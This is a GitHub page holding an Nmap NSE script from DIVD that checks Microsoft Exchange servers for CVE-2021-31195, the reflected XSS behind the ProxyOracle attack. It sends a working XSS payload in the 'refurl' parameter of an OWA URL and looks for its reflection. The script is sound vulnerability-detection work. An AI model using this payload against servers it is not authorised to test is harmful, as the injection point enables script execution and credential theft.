-
Notifications
You must be signed in to change notification settings - Fork 3
/
CVE-2021-31195.nse
82 lines (66 loc) · 2.81 KB
/
CVE-2021-31195.nse
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local strbuf = require "strbuf"
local vulns = require "vulns"
local rand = require "rand"
description = [[
*TODO*
]]
---
--@output
author = "Frank Breedijk of Dutch Institute for Vulnerability Disclosure (DIVD.nl)"
last_update = "August 30, 2021"
license = "Apache 2.0 - See http://www.apache.org/licenses/LICENSE-2.0"
categories = {"default", "discovery", "safe", "vuln", "exploit"}
portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")
local last_len = 0
function split(source, delimiters)
local elements = {}
local pattern = '([^'..delimiters..']+)'
string.gsub(source, pattern, function(value) elements[#elements + 1] = value; end);
return elements
end
action = function(host, port, redirects)
local dis_count, noun
local randomname = ".divd." .. rand.random_string(16,'abcdefghijklmnopqrstuvwxyz1234567890') .. ".dtd"
local vuln = {
title = "Exchange CVE-2021-31195 - Reflective XSS in Microsoft Exchange used by the ProxyOracle attack in conjunction with CVE-2021-31196",
state = vulns.STATE.NOT_VULN,
description = [[
By simply leading a user to visit a malicious link, ProxyOracle allows an attacker to recover the user’s password in plaintext format completely. ProxyOracle consists of two vulnerabilities:
CVE-2021-31195 - Reflected Cross-Site Scripting
CVE-2021-31196 - Padding Oracle Attack on Exchange Cookies Parsing
]],
IDS = {
CVE = "CVE-2021-31195"
},
references = {
--- 'http://csirt.divd.nl/DIVD-2021-00002'
},
dates = {
disclosure = { year = '2021', month = '08', day = '2x' }
}
}
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local v_level = nmap.verbosity() + (nmap.debugging()*2)
local output = strbuf.new()
local detail = 15
options = {header={}}
options['header']['User-Agent'] = "Mozilla/5.0 (CVE-2021-31195 vulnerability check)"
local attackuri = '/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\\&refurl=}}};alert(document.domain)//'
local answer = http.get(host, port, attackuri, options, false)
if answer.status == 301 or answer.status == 302 then
return "Error " .. answer.status .. " : " .. table.concat(answer.location," -> ")
elseif answer.status ~= 500 then
return "Error: " .. tostring(answer["status-line"]) .. "on CVE-2021-31195 exploitation"
end
-- refurl: }}};alert(document.domain)//
-- value: '\' },RefUrl: { value: '}}};alert(document.domain)//
if string.find(answer.body,"value: '\\' },RefUrl: { value: '}}};alert%(document.domain%)//") then
vuln.state = vulns.STATE.VULN
else
return "Exploitation of " .. vuln['IDS']['CVE'] .. " unsuccessful.\n" -- .. answer.body
end
return vuln_report:make_output(vuln)
end